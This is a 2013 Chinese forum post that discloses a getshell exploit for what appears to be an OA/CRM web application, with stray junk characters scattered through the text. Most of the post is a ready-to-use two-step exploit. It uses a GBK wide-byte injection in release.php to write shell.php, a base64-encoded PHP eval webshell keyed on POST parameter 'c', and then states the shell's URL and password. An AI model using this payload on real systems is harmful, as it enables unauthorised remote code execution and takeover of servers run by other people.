此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.# L7 \4 h% p, s/ B5 m2 Z
9 ]; |, z9 o- S) m
) c/ d/ A. Z2 R. S6 i& UEXP:
8 [* a! C1 E5 y " o. w6 q' G+ P# a- m# K
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
/ h% t) J3 M2 _) p" Y+ T 8 t7 H% Q: O3 C7 }$ }# g5 i
第二步: [GET]http://site/general/email/index.php" }& M" y" l; _4 K% g. u8 R0 n2 u
+ D; N/ Y5 X' K0 H* x
SHELL: http://site/general/email/shell.php 密码C
* \% @; K) n( b h) n ; h. t1 s' {* a$ k7 k) a2 B
, {( Q) W! a( o7 Z% p此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
- ~. U" y E0 Z+ Q - I% |8 T4 {, `$ n/ O, N6 K9 b
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
/ B& D+ H( N, \6 P' s9 L& I z6 y: w, v8 i3 w7 h; O7 d5 u
0 q7 \& s' d1 g# \# ^; q) k; R
|
发表于 2013-2-4 16:19:29
收藏
支持
反对